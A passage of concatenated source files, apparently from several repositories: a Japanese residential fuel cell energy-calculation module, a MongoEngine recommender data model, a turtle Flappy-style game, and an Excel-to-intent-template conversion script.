    # Condition 4: t_star_PU_start_d = 23 and t < t_star_PU_start_d
    f4 = np.logical_and(t_star_PU_start_d == 23, t < t_star_PU_start_d)
    E_G_PU_d_t[f4] = 0
    # Condition 5: t_star_PU_start_d = 23 and t = t_star_PU_start_d
    f5 = np.logical_and(t_star_PU_start_d == 23, t == t_star_PU_start_d)
    E_G_PU_d_t[f5] = E_G_PU_d[f5]
    return E_G_PU_d_t
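# Illustrative sketch (not part of the original module): dispatching a daily gas budget
# over the hours of each day with constant, made-up inputs.
def _example_E_G_PU_dispatch():
    hours = 24 * 365
    E_E_PU_d_t = np.full(hours, 0.3)     # coverable electric load, kWh/h (assumed)
    e_E_PU_d = np.full(365, 0.35)        # daily average generation efficiency (assumed)
    E_E_PU_d = get_E_E_PU_d(E_E_PU_d_t)  # kWh/d (helper defined further below in this module)
    E_G_PU_d = np.full(365, 40.0)        # daily gas budget, MJ/d (assumed)
    # Hours before the start hour get 0, the start hour gets the remainder,
    # and later hours run at the gas rate implied by the electric load.
    return calc_E_G_PU_d_t(E_G_PU_d, E_E_PU_d, E_E_PU_d_t, e_E_PU_d)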
def get_t_star_PU_start_d(E_G_PU_d, E_dash_G_PU_d_h):
"""日付dにおける発電ユニットの稼働開始時刻 (h) (14b)
Args:
E_G_PU_d(ndarray): 1日当たりの発電ユニットのガス消費量 (MJ/d)
E_dash_G_PU_d_h(ndarray): 日付dの時刻hにおける当該時刻から23時までの発電ユニットのガス消費量 (MJ/d)
Returns:
ndarray: 日付dにおける発電ユニットの稼働開始時刻 (h)
"""
# 0,1,2,3...23, 0,1,2...23, .. と 24*365のインデックスを作成
index_map = np.tile(np.arange(24), 365)
# E_G_PU_d <= E_dash_PU_d_h を満たすインデックスをTrueにする
bool_map = np.repeat(E_G_PU_d, 24) <= E_dash_G_PU_d_h
# index_map のうち、 bool_mapがFalseになっている箇所を0にする
index_map = index_map * bool_map
# index_map を 365 * 24 の2次元配列にする
index_map = np.reshape(index_map, (365, 24))
# 1日単位で最大のインデックスを取得
t_star_PU_start_d = np.max(index_map, axis=1)
return t_star_PU_start_d
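# Illustrative sketch (not part of the original module): the start hour is the latest
# hour whose remaining-hours gas need still reaches the daily budget. Values are made up.
def _example_t_star_PU_start():
    one_day = np.arange(24, 0, -1) * 2.0    # remaining gas need per start hour: 48, 46, ..., 2 MJ (assumed)
    E_dash_G_PU_d_h = np.tile(one_day, 365)
    E_G_PU_d = np.full(365, 10.0)           # daily gas budget, MJ/d (assumed)
    # 10 <= 48 - 2h holds up to h = 19, so every day starts at hour 19
    return get_t_star_PU_start_d(E_G_PU_d, E_dash_G_PU_d_h)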
def get_E_dash_G_PU_d_h(E_E_PU_d_t, e_E_PU_d):
"""日付dの時刻hにおける当該時刻から23時までの発電ユニットのガス消費量 (MJ/d) (14c)
Args:
E_E_PU_d_t(ndarray): 日付dの時刻tにおける1時間当たりの発電ユニットの分担可能電力負荷 (kWh/h)
e_E_PU_d(ndarray): 日付dにおける発電ユニットの日平均発電効率 (-)
Returns:
ndarray: 日付dの時刻hにおける当該時刻から23時までの発電ユニットのガス消費量 (MJ/d)
"""
E_E_PU_d_t = np.reshape(E_E_PU_d_t, (365, 24))
E_dash_G_PU_d_h = np.zeros((365, 24))
for h in range(24):
E_dash_G_PU_d_h[:, h] = np.sum(E_E_PU_d_t[:, h:24], axis=1) * 3.6 / e_E_PU_d
return np.reshape(E_dash_G_PU_d_h, 24*365)
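# Illustrative sketch (not part of the original module): the same tail sums can be built
# without the explicit hour loop by using a reversed cumulative sum.
def _tail_gas_consumption_vectorized(E_E_PU_d_t, e_E_PU_d):
    E_E = np.reshape(E_E_PU_d_t, (365, 24))
    # Reversed cumsum gives, for each hour h, the sum over hours h..23 of the same day
    tail = np.cumsum(E_E[:, ::-1], axis=1)[:, ::-1]
    return np.reshape(tail * 3.6 / e_E_PU_d[:, np.newaxis], 24 * 365)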
def get_E_G_PU_d(PU_type, E_G_PU_EVt_d, E_G_PU_HVt_d=None):
"""1日当たりの発電ユニットのガス消費量 (MJ/d) (15)
Args:
PU_type(str): 発電ユニットの発電方式
E_G_PU_EVt_d(ndarray): 1日当たりの発電ユニットの発電量推定時の仮想ガス消費量 (MJ/d)
E_G_PU_HVt_d(ndarray, optional): 1日当たりの発電ユニットの排熱量推定時の仮想ガス消費量 (MJ/d) (Default value = None)
Returns:
ndarray: 1日当たりの発電ユニットの燃料消費量 (MJ/d)
"""
if PU_type == '熱主':
# (15a)
return np.clip(E_G_PU_EVt_d, None, E_G_PU_HVt_d)
elif PU_type == '電主':
# (15b)
return E_G_PU_EVt_d
else:
raise ValueError(PU_type)
def get_E_G_PU_EVt_d(E_E_gen_PU_EVt_d, e_E_PU_d):
"""1日当たりの発電ユニットの発電量推定時の仮想ガス消費量 (MJ/d) (16)
Args:
E_E_gen_PU_EVt_d(ndarray): 1日当たりの発電ユニットの発電量推定時の仮想発電量 (kWh/d)
e_E_PU_d(ndarray): 発電ユニットの日平均発電効率 (-)
Returns:
ndarray: 1日当たりの発電ユニットの発電量推定時の仮想燃料消費量 (MJ/d)
"""
return E_E_gen_PU_EVt_d * 3.6 / e_E_PU_d
def get_E_E_gen_PU_EVt_d(E_E_PU_d, L_DHW_d, L_HWH_d, a_PU, a_DHW, a_HWH, b, c):
"""1日当たりの発電ユニットの発電量推定時の仮想発電量 (kWh/d) (17)
Args:
E_E_PU_d(ndarray): 1日当たりの発電ユニットの分担可能電力負荷 (kWh/d)
L_DHW_d(ndarray): 1日当たりの浴槽追焚を除く太陽熱補正給湯熱負荷 (MJ/d)
L_HWH_d(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
a_PU(float): パラメータ a_PU
a_DHW(float): パラメータ a_DHW
a_HWH(float): パラメータ a_HWH
b(float): パラメータ b
c(float): パラメータ c
Returns:
ndarray: 1日当たりの発電ユニットの発電量推定時の仮想発電量
"""
E_E_gen_PU_EVt_d = np.clip(a_PU * E_E_PU_d * 3.6 + a_DHW * L_DHW_d + a_HWH * L_HWH_d + b, None,
E_E_PU_d * c * 3.6) / 3.6
return E_E_gen_PU_EVt_d
def get_E_G_PU_HVt_d(e_H_PU_d, L_DHW_d, L_HWH_d, r_H_gen_PU_HVt_d, a_DHW, a_HWH):
"""1日当たりの発電ユニットの排熱量推定時の仮想燃料消費 (MJ/d) (18)
Args:
e_H_PU_d(ndarray): 発電ユニットの日平均排熱効率 (-)
L_DHW_d(ndarray): 1日当たりの浴槽追焚を除く太陽熱補正給湯熱負荷 (MJ/d)
L_HWH_d(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
r_H_gen_PU_HVt_d(ndarray): 発電ユニットの排熱量推定時の仮想排熱量上限比 (-)
a_DHW(float): パラメータ a_DHW
a_HWH(float): パラメータ a_HWH
Returns:
ndarray: 1日当たりの発電ユニットの排熱量推定時の仮想燃料消費 (MJ/d)
"""
E_G_PU_HVt_d = (a_DHW * L_DHW_d + a_HWH * L_HWH_d) * r_H_gen_PU_HVt_d / e_H_PU_d
return E_G_PU_HVt_d
def get_r_H_gen_PU_HVt_d(L_DHW_d, L_HWH_d, a_DHW, a_HWH, b):
"""発電ユニットの排熱量推定時の仮想排熱量上限比 (-) (19)
Args:
L_DHW_d(ndarray): 1日当たりの浴槽追焚を除く太陽熱補正給湯熱負荷 (MJ/d)
L_HWH_d(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
a_DHW(float): パラメータ a_DHW
a_HWH(float): パラメータ a_HWH
b(float): パラメータ b
Returns:
ndarray: 発電ユニットの排熱量推定時の仮想排熱量上限比
"""
r_H_gen_PU_HVt_d = a_DHW * L_DHW_d + a_HWH * L_HWH_d + b
return r_H_gen_PU_HVt_d
# ============================================================================
# 14.4 Power generation efficiency
# ============================================================================
def get_e_E_PU_d(E_E_PU_d, L_DHW_d, L_HWH_d, a_PU, a_DHW, a_HWH, b, e_E_PU_d_max, e_E_PU_d_min):
"""発電ユニットの日平均発電効率 (-) (20)
Args:
E_E_PU_d(ndarray): 1日当たりの発電ユニットの分担可能電力負荷 (kWh/d)
L_DHW_d(ndarray): 1日当たりの浴槽追焚を除く太陽熱補正給湯熱負荷 (MJ/d)
L_HWH_d(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
a_PU(float): パレメータ a_PU
a_DHW(float): パラメータ a_DHW
a_HWH(float): パラメータ a_HWH
b(float): パラメータ b
e_E_PU_d_max(float): 上限値
e_E_PU_d_min(float): 下限値
Returns:
ndarray: 発電ユニットの日平均発電効率 (-)
"""
e_E_PU_d = a_PU * E_E_PU_d * 3.6 + a_DHW * L_DHW_d + a_HWH * L_HWH_d + b
return np.clip(e_E_PU_d, e_E_PU_d_min, e_E_PU_d_max)
# ============================================================================
# 14.5 Exhaust heat efficiency
# ============================================================================
def get_e_H_PU_d(E_E_PU_d, L_DHW_d, L_HWH_d, a_PU, a_DHW, a_HWH, b, e_H_PU_d_min, e_H_PU_d_max):
"""発電ユニットの日平均排熱効率 (-) (21)
Args:
E_E_PU_d(ndarray): 1日当たりの発電ユニットの分担可能電力負荷 (kWh/d)
L_DHW_d(ndarray): 1日当たりの浴槽追焚をの除く太陽熱補正給湯熱負荷 (MJ/d)
L_HWH_d(ndarray): 1日当たりの温水暖房の熱負荷 (MJ/d)
a_PU(float): パレメータ a_PU
a_DHW(float): パラメータ a_DHW
a_HWH(float): パラメータ a_HWH
b(float): パラメータ b
e_H_PU_d_max(float): 上限値
e_H_PU_d_min(float): 下限値
Returns:
ndarray: 発電ユニットの日平均排熱効率 (-)
"""
e_H_PU_d = a_PU * E_E_PU_d * 3.6 + a_DHW * L_DHW_d + a_HWH * L_HWH_d + b
return np.clip(e_H_PU_d, e_H_PU_d_min, e_H_PU_d_max)
# ============================================================================
# 14.6 Coverable electric load
# ============================================================================
def get_E_E_PU_d(E_E_PU_d_t):
"""1日当たりの発電ユニットの分担可能電力負荷 (kWh/d) (22)
Args:
E_E_PU_d_t(ndarray): 1時間当たりの発電ユニットの分担可能電力負荷 (kWh/h)
Returns:
ndarray: 1日当たりの発電ユニットの分担可能電力負荷 (kWh/d)
"""
tmp = E_E_PU_d_t.reshape((365, 24))
E_E_PU_d = np.sum(tmp, axis=1)
return E_E_PU_d
def get_E_E_PU_d_t(E_E_dmd_PU_d_t, P_rtd_PU, reverse):
"""1時間当たりの発電ユニットの分担可能電力負荷 (kWh/h) (23)
Args:
E_E_dmd_PU_d_t(ndarray): 1時間当たりの発電ユニットの電力需要 (kWh/h)
P_rtd_PU(int): 定格発電出力 (W)
reverse(bool): 逆潮流の有無
Returns:
ndarray: 1時間当たりの発電ユニットの分担可能電力負荷 (kWh/h)
"""
    if not reverse:
return np.clip(E_E_dmd_PU_d_t, None, P_rtd_PU * 10 ** (-3))
else:
return np.ones_like(E_E_dmd_PU_d_t) * P_rtd_PU * 10 ** (-3)
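# Illustrative sketch (not part of the original module): without reverse power flow the
# coverable load is the demand capped at the rated output; with it, the unit is assumed
# to run at rated output every hour. Values are made up.
def _example_E_E_PU_cap():
    demand = np.array([0.2, 0.5, 1.2])  # kWh/h (assumed)
    rated = 700                         # rated output in W, i.e. 0.7 kWh per hour
    no_export = get_E_E_PU_d_t(demand, rated, reverse=False)   # -> [0.2, 0.5, 0.7]
    with_export = get_E_E_PU_d_t(demand, rated, reverse=True)  # -> [0.7, 0.7, 0.7]
    return no_export, with_export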
def get_E_E_dmd_PU_d_t(E_E_dmd_d_t, E_E_TU_aux_d_t):
"""発電ユニットの電力需要 (kWh/h) (24)
Args:
E_E_dmd_d_t(ndarray): 1時間当たりの電力需要 (kWh/h)
E_E_TU_aux_d_t(ndarray): 1時間当たりのタンクユニットの補機消費電力量 (kWh/h)
Returns:
発電ユニットの電力需要 (kWh/h)
"""
E_E_dmd_PU_d_t = E_E_dmd_d_t + E_E_TU_aux_d_t
return E_E_dmd_PU_d_t
# ============================================================================
# 15. Auxiliary electricity consumption of the tank unit
# ============================================================================
def get_E_E_TU_aux_d_t(E_E_TU_aux_DHW_d_t, E_E_TU_aux_HWH_d_t, E_E_TU_aux_ba2_d_t):
"""1時間当たりのタンクユニットの補機消費電力量 (25)
Args:
E_E_TU_aux_DHW_d_t(ndarray): 1時間当たりの給湯時のタンクユニットの補機消費電力量 (kWh/h)
E_E_TU_aux_HWH_d_t(ndarray): 1時間当たりの温水暖房時のタンクユニットの補機消費電力量 (kWh/h)
E_E_TU_aux_ba2_d_t(ndarray): 1時間当たりの浴槽追焚のタンクユニットの補機消費電力量 (kWh/h)
Returns:
ndarray: 1時間当たりのタンクユニットの補機消費電力量 (kWh/h)
"""
E_E_TU_aux_d_t = E_E_TU_aux_DHW_d_t + E_E_TU_aux_HWH_d_t + E_E_TU_aux_ba2_d_t
return E_E_TU_aux_d_t
def get_E_E_TU_aux_DHW_d_t(P_TU_aux_DHW):
"""1時間当たりの給湯時のタンクユニットの補機消費電力量 (kWh/h) (26)
Args:
P_TU_aux_DHW(float): 給湯のタンクユニットの補機消費電力 (W)
Returns:
float: 1時間当たりの給湯時のタンクユニットの補機消費電力量 (kWh/h)
"""
E_E_TU_aux_DHW_d_t = P_TU_aux_DHW * 10 ** (-3)
return E_E_TU_aux_DHW_d_t
def get_E_E_TU_aux_HWH_d_t(exhaust, P_TU_aux_HWH=None, r_WS_HWH_d_t=None):
"""1時間当たりの温水暖房時のタンクユニットの補機消費電力量 (kWh/h) (27)
Args:
exhaust(bool): 温水暖房への排熱利用がある場合はTrue
P_TU_aux_HWH(param r_WS_HWH_d_t: 温水暖房の温水供給運転率 (-), optional): 給湯のタンクユニットの補機消費電力 (W) (Default value = None)
r_WS_HWH_d_t(return: 1時間当たりの給湯時のタンクユニットの補機消費電力量 (kWh/h), optional): 温水暖房の温水供給運転率 (-) (Default value = None)
Returns:
ndarray: 1時間当たりの給湯時のタンクユニットの補機消費電力量 (kWh/h)
"""
    if exhaust:
        # -- (1) Exhaust heat is used for hot water heating --
        E_E_TU_aux_HWH_d_t = P_TU_aux_HWH * r_WS_HWH_d_t * 10 ** (-3)
    else:
        # -- (2) Exhaust heat is not used for hot water heating --
        E_E_TU_aux_HWH_d_t = 73.0 * r_WS_HWH_d_t * 10 ** (-3)
return E_E_TU_aux_HWH_d_t
def calc_E_E_TU_aux_ba2_d_t(L_BB_DHW_ba2_d_t):
"""1時間当たりの浴槽追焚のタンクユニットの補機消費電力量 (kWh/h)
Args:
L_BB_DHW_ba2_d_t(ndarray): 1時間当たりの浴槽追焚時におけるバックアップボイラーが分担する給湯熱負荷 (MJ/h)
Returns:
ndarray: 1時間当たりの浴槽追焚のタンクユニットの補機消費電力量 (kWh/h)
"""
E_E_TU_aux_ba2_d_t = bb_dhw.get_E_E_BB_aux_ba2_d_t(L_BB_DHW_ba2_d_t)
return E_E_TU_aux_ba2_d_t
def get_L_BB_DHW_ba2_d_t(L_dashdash_ba2_d_t):
"""1時間当たりの浴槽追焚時におけるバックアップボイラーが分担する給湯熱負荷 (MJ/h) (28)
Args:
L_dashdash_ba2_d_t(ndarray): 1 時間当たりの浴槽追焚時の太陽熱補正給湯熱負荷(MJ/h)
Returns:
ndarray: 1 時間当たりの浴槽追焚時におけるバックアップボイラーが分担する給湯熱負荷(MJ/h)
"""
return L_dashdash_ba2_d_t
# ============================================================================
# 16. Miscellaneous
# ============================================================================
def get_L_DHW_d(L_DHW_d_t):
"""1日当たりの発電ユニットによる浴槽追焚を除く給湯熱負荷 (MJ/d) (29)
Args:
L_DHW_d_t(ndarray): 1時間当たりの発電ユニットにおける浴槽追焚を除く給湯熱負荷 (MJ/d)
Returns:
ndarray: 1日当たりの発電ユニットにおける浴槽追焚を除く給湯熱負荷 (MJ/d)
"""
L_DHW_d = np.sum(L_DHW_d_t.reshape(365, 24), axis=1)
return L_DHW_d
def get_L_DHW_d_t(L_dashdash_k_d_t, L_dashdash_w_d_t, L_dashdash_s_d_t, L_dashdash_b1_d_t, L_dashdash_b2_d_t,
L_dashdash_ba1_d_t):
"""1時間当たりの発電ユニットによる浴槽追焚を除く給湯熱負荷 (30)
Args:
L_dashdash_k_d_t(ndarray): 1時間当たりの台所水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_w_d_t(ndarray): 1時間当たりの洗面水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_s_d_t(ndarray): 1時間当たりの浴室シャワー水栓における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b1_d_t(ndarray): 1時間当たりの浴槽水栓湯はり時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_b2_d_t(ndarray): 1時間当たりの浴槽自動追焚時における太陽熱補正給湯熱負荷 (MJ/h)
L_dashdash_ba1_d_t(ndarray): 1時間当たりの浴槽水栓さし湯における太陽熱補正給湯熱負荷 (MJ/h)
Returns:
ndarray: 1時間当たりの発電ユニットによる浴槽追焚を除く給湯熱負荷 (MJ/h)
"""
L_DHW_d_t = L_dashdash_k_d_t + L_dashdash_w_d_t + L_dashdash_s_d_t + L_dashdash_b1_d_t + L_dashdash_b2_d_t + L_dashdash_ba1_d_t
return L_DHW_d_t
def get_L_HWH_d(L_HWH_d_t):
"""1日当たりの温水暖房の熱負荷 (31)
Args:
L_HWH_d_t(ndarray): 1時間当たりの温水暖房の熱負荷 (MJ/h)
Returns:
ndarray: 1日当たりの温水暖房の熱負荷 (MJ/d)
"""
# 8760時間の1次元配列を364x24の2次元配列に変換する
tmp = L_HWH_d_t.reshape((365, 24))
# 2次元目を合算して配列を1次元化
L_HWH_d = np.sum(tmp, axis=1)
return L_HWH_d
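# Illustrative sketch (not part of the original module): how a few of the functions above
# chain together for one run. All inputs are made up; in practice they come from the rest
# of the energy-standard calculation.
def _example_pipeline():
    hours = 24 * 365
    E_E_dmd_d_t = np.full(hours, 0.4)      # household electricity demand, kWh/h (assumed)
    E_E_TU_aux_d_t = np.full(hours, 0.01)  # tank unit auxiliaries, kWh/h (assumed)
    E_E_dmd_PU_d_t = get_E_E_dmd_PU_d_t(E_E_dmd_d_t, E_E_TU_aux_d_t)
    E_E_PU_d_t = get_E_E_PU_d_t(E_E_dmd_PU_d_t, P_rtd_PU=700, reverse=False)
    E_E_PU_d = get_E_E_PU_d(E_E_PU_d_t)
    e_E_PU_d = np.full(365, 0.35)          # daily average generation efficiency (assumed)
    E_G_PU_d = np.full(365, 40.0)          # daily gas budget, MJ/d (assumed)
    E_G_PU_d_t = calc_E_G_PU_d_t(E_G_PU_d, E_E_PU_d, E_E_PU_d_t, e_E_PU_d)
    return get_E_E_gen_PU_d_t(E_G_PU_d_t, e_E_PU_d)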
``` |
{
"source": "Jjjeaswn/simple-recommender",
"score": 2
} |
#### File: rs/data/mongo.py
```python
from mongoengine import *
connect('rs')
class Ratings(Document):
user_key = StringField()
item_key = StringField()
value = FloatField()
meta = {
'ordering': ['+user_key', '+item_key']
}
class Features(Document):
type = StringField()
key = StringField()
values = ListField()
meta = {
'ordering': ['+type', '+key']
}
class Predictions(Document):
user_key = StringField()
item_key = StringField()
value = FloatField()
class UserTopKItems(Document):
user = StringField()
items = ListField()
def load_features(key, ftype=None):
if ftype is None:
result = Features.objects(key=key).first()
else:
result = Features.objects(key=key, type=ftype).first()
if result is not None:
return result.values
else:
return None
def save_features(key, ftype=None, values=None):
if ftype is None:
Features.objects(key=key).update_one(values=values, upsert=True)
else:
Features.objects(key=key, type=ftype).update_one(values=values, upsert=True)
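# Illustrative usage sketch (not part of the original module): store a feature vector
# for one key and read it back. The key and values below are made up.
def _example_round_trip():
    save_features(key='user-42', ftype='user', values=[0.1, 0.2, 0.3])
    return load_features('user-42', ftype='user')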
``` |
{
"source": "jjjihun/oss-mju-class-5team",
"score": 4
} |
#### File: oss-mju-class-5team/freegames/flappy.py
```python
from random import *
from turtle import *
from freegames import vector
writer = Turtle(visible=False)
state={'score':0}
bird = vector(0, 0)
balls = []
sizes = []
speeds = []
def tap(x, y):
"Move bird up in response to screen tap."
up = vector(0, 30)
bird.move(up)
def inside(point):
"Return True if point on screen."
return -200 < point.x < 200 and -200 < point.y < 200
def draw(alive):
"Draw screen objects."
clear()
goto(bird.x, bird.y)
if alive:
dot(10, 'green')
else:
dot(10, 'red')
writer.write(state['score'])
index = 0
for ball in balls:
goto(ball.x, ball.y)
dot(sizes[index], 'black')
index +=1
update()
def move():
"Update object positions."
bird.y -= 5
index=0
for ball in balls:
ball.x -= speeds[index]
index += 1
if randrange(10) == 0:
y = randrange(-199, 199)
ball = vector(199, y)
size = randrange(10,40)
speed = randrange(1,10)
balls.append(ball)
sizes.append(size)
speeds.append(speed)
state['score'] += 1
while len(balls) > 0 and not inside(balls[0]):
balls.pop(0)
sizes.pop(0)
speeds.pop(0)
if not inside(bird):
draw(False)
return
for ball in balls:
if abs(ball - bird) < 15:
draw(False)
writer.write(state['score'])
return
draw(True)
ontimer(move, 50)
setup(420, 420, 370, 0)
hideturtle()
tracer(False)
writer.hideturtle()
writer.penup()
writer.goto(190,190)
writer.color('black')
up()
onscreenclick(tap)
move()
done()
``` |
{
"source": "JJJJane/DFA-template",
"score": 3
} |
#### File: excel_to_config/read_excel_to_config/read_excel_to_config.py
```python
import pandas as pd
import codecs
import os
import shutil
import json
def copy_file(sourceSrcfile, dsDir):
    if not os.path.exists(dsDir):
os.makedirs(dsDir)
if os.path.isfile(sourceSrcfile):
shutil.copy(sourceSrcfile, dsDir)
print('copy file {} ==> {}'.format(sourceSrcfile, dsDir))
def copy_files_to_dir(sourceSrcfiles, dsDir):
for file in sourceSrcfiles:
copy_file(file, dsDir)
def read_excel_to_template(source_file, target_file, intent_type):
excel_file = pd.read_excel(source_file, sheet_name=intent_type)
op = excel_file.动作
entity = excel_file.实体
domain = excel_file.domain
intent = excel_file.意图
hard_code = excel_file.hard_code
with codecs.open(target_file, 'w', encoding='utf-8') as f:
for o, e, d, i, h in zip(op, entity, domain, intent, hard_code):
if pd.isna(h):
h = 0
if not pd.isna(o) and not pd.isna(e):
print(o + e, d, i, int(h), file=f, sep=',', end='\r\n')
print(e + o, d, i, int(h), file=f, sep=',', end='\r\n')
elif pd.isna(o) and not pd.isna(e):
print(e, d, i, int(h), file=f, sep=',', end='\r\n')
# skip blank line
elif pd.isna(o) and pd.isna(e) and pd.isna(d) and pd.isna(i):
pass
else:
raise ValueError('Invalid data format')
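# Illustrative sketch (not part of the original module): the row expansion performed by
# read_excel_to_template, shown on in-memory values instead of an Excel sheet. The action
# and entity strings below are made-up examples.
def _example_template_lines():
    rows = [('打开', '灯', 'device', 'turn_on', 0)]  # (action, entity, domain, intent, hard_code)
    lines = []
    for o, e, d, i, h in rows:
        lines.append('{}{},{},{},{}'.format(o, e, d, i, h))  # action + entity
        lines.append('{}{},{},{},{}'.format(e, o, d, i, h))  # entity + action
    return lines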
def read_excel_to_entity(source_file: str, target_file: str, sheet_name='实体词') -> None:
excel_file = pd.read_excel(source_file, sheet_name=sheet_name)
entity = excel_file.实体词
with codecs.open(target_file, 'w', encoding='utf-8') as f:
for e in entity:
if not pd.isna(e):
print(e, file=f, sep='', end='\r\n')
# skip blank line
elif pd.isna(e):
pass
else:
raise ValueError('Invalid data format')
def read_excel_to_op(source_file: str, target_file: str, sheet_name='动作词') -> None:
excel_file = pd.read_excel(source_file, sheet_name=sheet_name)
op = excel_file.动作词
with codecs.open(target_file, 'w', encoding='utf-8') as f:
for o in op:
if not pd.isna(o):
print(o, file=f, sep='', end='\r\n')
# skip blank line
elif pd.isna(o):
pass
else:
raise ValueError('Invalid data format')
def save_json_file(json_string, file):
with codecs.open(file, 'w', 'utf-8') as _out:
_out.write(json.dumps(json_string, ensure_ascii=False, indent=2))
_out.flush()
_out.close()
if __name__ == '__main__':
BASE_DIR = '../../../'
read_excel_to_template(BASE_DIR + 'model/excel_to_config/excel_data/symp_rule.xlsx',
BASE_DIR + 'model/excel_to_config/excel_data/symp_template.list',
intent_type='意图说法表')
read_excel_to_entity(BASE_DIR + 'model/excel_to_config/excel_data/symp_rule.xlsx',
BASE_DIR + 'model/excel_to_config/excel_data/entity.txt',
sheet_name='实体词')
read_excel_to_op(BASE_DIR + 'model/excel_to_config/excel_data/symp_rule.xlsx',
BASE_DIR + 'model/excel_to_config/excel_data/op.txt',
sheet_name='动作词')
dsDir = BASE_DIR + 'model/rules/'
sourceSrcfiles = [BASE_DIR + 'model/excel_to_config/excel_data/symp_template.list',
]
copy_files_to_dir(sourceSrcfiles, dsDir)
dsDir = BASE_DIR + 'model/corpus/'
sourceSrcfiles = [BASE_DIR + 'model/excel_to_config/excel_data/op.txt',
BASE_DIR + 'model/excel_to_config/excel_data/entity.txt'
]
copy_files_to_dir(sourceSrcfiles, dsDir)
``` |